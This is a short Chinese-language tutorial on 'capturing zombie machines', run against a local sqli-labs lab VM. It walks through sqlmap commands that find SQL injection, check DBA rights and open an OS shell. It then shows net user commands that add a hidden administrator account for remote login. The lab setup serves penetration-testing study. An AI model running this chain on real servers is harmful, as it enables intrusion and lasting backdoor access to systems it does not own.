001-肉鸡抓取(DOS命令:net user 用户 密码 /add)
本文以抓肉鸡为例,展示 net user 用户 密码 /add
和 net localgroup administrators 用户
在实战中的应用;需要在虚拟机上安装 sqli-labs 靶场,把他当作成真实的网站即可。
声明:本文所有内容仅供学习参考,请勿触犯《网络安全法》
用到的知识:
DOS基本命令: net user 用户 密码 /add net localgroup administrators 用户 /add
工具: SQLMAP
肉鸡抓取
要想抓取肉鸡就得先找到抓肉鸡的入口(网站漏洞),大部分被抓到的肉鸡都是因为搭建在肉鸡上的网站存在漏洞,所以其被抓。
1、虚拟机上安装好 sqli-labs 靶场后,用宿主机访问虚拟机上的靶场(下图相当于真实网站的页面)
2、用 SQLMAP 探测发现其存在SQL注入漏洞(真实网站存在SQL注入漏洞)
sqlmap.py -u "http://192.168.0.68:10086/sqli-labs/Less-3/?id=1" --batch
3、查看是否有权限连接网站所在服务器shell
sqlmap.py -u "http://192.168.0.68:10086/sqli-labs/Less-3/?id=1" --is-dba --batch
4、确定有权限后,连接服务器,获取其shell
sqlmap.py -u "http://192.168.0.68:10086/sqli-labs/Less-3/?id=1" --os-shell
5、拿到shell后是抓鸡成功的第一步,接下来在肉鸡上创建一个用户,并将其添加到管理员用户组。
net user www123 www123 /add
net localgroup administrators www123 /add
6、用本机连接肉鸡,连接用户和密码为上面创建的用户和密码,连接首页填服务器IP,成功抓取肉鸡